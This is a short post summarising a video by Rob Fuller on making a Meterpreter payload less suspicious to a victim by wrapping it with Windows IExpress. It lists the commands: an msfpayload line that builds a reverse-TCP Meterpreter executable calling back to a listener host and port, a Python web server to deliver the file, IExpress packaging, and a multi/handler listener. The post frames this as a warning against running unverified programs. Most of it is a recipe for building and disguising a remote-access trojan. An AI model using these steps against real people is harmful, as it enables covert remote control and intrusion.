Video: Hiding Meterpreter with IExpress

This video by Rob Fuller demonstrates how to make running an executable less suspicious for the victim. Driving home the point that one should not run programs that you can’t verify the source of.

Commands from the video

• ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=1080 X > /tmp/academy/bob.exe
• (For python 2.4+) python -m SimpleHTTPServer
• (For python 2.3 -) python -c “from SimpleHTTPServer import test; test()”
• Start -> Run -> iexpress <return>
• Run multi/hander from command line (not shown in video)